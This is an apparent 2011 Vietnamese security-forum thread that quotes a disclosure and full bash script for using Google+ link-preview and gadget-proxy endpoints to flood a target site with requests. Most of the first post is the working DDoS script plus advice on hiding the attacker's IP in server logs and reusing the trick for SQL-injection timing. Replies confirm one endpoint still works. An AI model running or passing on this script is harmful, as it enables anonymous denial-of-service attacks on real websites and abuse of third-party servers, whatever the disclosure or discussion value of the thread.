[Discussion] Make Requests Through Google Servers DDos (IHteam)! |
02/09/2011 09:07:07 (+0700) | #1 | 246403 |
ga_cum06
Member
|
0 |
|
|
Joined: 04/05/2008 19:01:15
Messages: 29
Offline
|
|
How does it work?
The vulnerable pages are “/_/sharebox/linkpreview/“ and “gadgets/proxy?“
Is possible to request any file type, and G+ will download and show all the content. So, if you parallelize so many requests, is possible to DDoS any site with Google bandwidth. Is also possible to start the attack without be logged in G+.
Attack vectors:
The advantage of using Google and make requests through their servers, is to be even more anonymous when you attack some site (TOR+This method); The funny thing is that apache will log Google IPs.
But beware: gadgets/proxy? will send your ip in apache log, if you want to attack, you’ll need to use /_/sharebox/linkpreview/
Also the Sql injection Time attack will work using this method.
DDoS attack is just an example, do not start ddos for no reason
Pratical examples:
https://plus.google.com/_/sharebox/linkpreview/?c=<SITE>&t=1&_reqid=<RANDOM_NUMBERS>&rt=j
or
https://images2-focus-opensocial.googleusercontent.com/gadgets/proxy?url=<SITE>&container=focus
code
#!/bin/bash
# Bug found by #
# Simone 'R00T_ATI' Quatrini #
# Mauro 'epicfail' Gasperini #
# Site: http://www.ihteam.net #
function start {
echo "[*] Sending `echo $2` Requests..."
for a in `seq $2`
do
id=$((RANDOM%3999999+3000000))
nohup curl "https://plus.google.com/_/sharebox/linkpreview/?c=$url&t=1&_reqid=$id&rt=j" -k -A "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0" > /dev/null 2>&1 &
nohup curl "https://images2-focus-opensocial.googleusercontent.com/gadgets/proxy?url=$urlclear&container=focus" -k -A "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0" > /dev/null 2>&1 &
done
echo "[*] Still attacking `echo $urlclear`"
echo "[*] Sleeping for 10 Seconds"
sleep 10
start url $2 urlclear
}
echo ''
echo ' 88888888ba, 88888888ba, ad88888ba '
echo ' aa 88 `"8b 88 `"8b d8" "8b '
echo ' 88 88 `8b 88 `8b Y8, '
echo 'aaaa88aaaa 88 88 88 88 ,adPPYba, `Y8aaaaa, '
echo '""""88"""" 88 88 88 88 a8" "8a `"""""8b, '
echo ' 88 88 8P 88 8P 8b d8 `8b '
echo ' "" 88 .a8P 88 .a8P "8a, ,a8" Y8a a8P '
echo ' 88888888Y"" 88888888Y"" `"YbbdP"" "Y88888P"'
echo ''
if [ "$#" -lt 2 ]; then
echo "Usage: $0 <big file> <Requests>"
echo "Example: $0 http://www.site.com/very_big_file.tar.gz 1000"
echo ""
exit 0
fi
case $2 in
*[!0-9]* ) echo "$2 is not numeric" && exit 1;;
esac
echo "Attack -->" $1
match1=/
repl1=%2F
match2=:
repl2=%3A
url=$1
urlclear=$1
url=${url//$match1/$repl1}
url=${url//$match2/$repl2}
echo ""
echo "[*] Loop started! CTRL+C to stop"
echo ""
start url $2 urlclear
Các bác có thông tin gì thêm về việc này không. từ ngày hva bị DDos đến vietnamnet cứ đi đâu nhìn thấy chữ này là mình sôi cả tiết, các anh STL có thấy thì bỏ qua nhé. Đừng thực hành làm gì ) |
|
...Ước mơ xây trường học cho trẻ em nghèo Việt Nam |
|
|
|
[Discussion] Make Requests Through Google Servers DDos (IHteam)! |
02/09/2011 09:25:17 (+0700) | #2 | 246407 |
|
xnohat
Moderator
|
Joined: 30/01/2005 13:59:19
Messages: 1210
Location: /dev/null
Offline
|
|
Xác nhận là còn 1 URL còn khả năng gây tác hại
https://images2-focus-opensocial.googleusercontent.com/gadgets/proxy?url=http://vnexpress.net/Files/Subject/3b/a2/e5/11/clinton2.jpg&container=focus
Google server sẽ get file trên về và hồi trả lại với đuôi *.txt |
|
iJust clear, "What I need to do and how to do it"/i
br
brBox tán gẫu dời về: http://www.facebook.com/hvaonline |
|
[Discussion] Make Requests Through Google Servers DDos (IHteam)! |
03/09/2011 08:45:15 (+0700) | #3 | 246433 |
ga_cum06
Member
|
0 |
|
|
Joined: 04/05/2008 19:01:15
Messages: 29
Offline
|
|
sáng nay em get thế này vẫn ổn áp
https://images2-focus-opensocial.googleusercontent.com/gadgets/proxy?url=/hvaonline/posts/list/39969.html&container=focus |
|
...Ước mơ xây trường học cho trẻ em nghèo Việt Nam |
|
|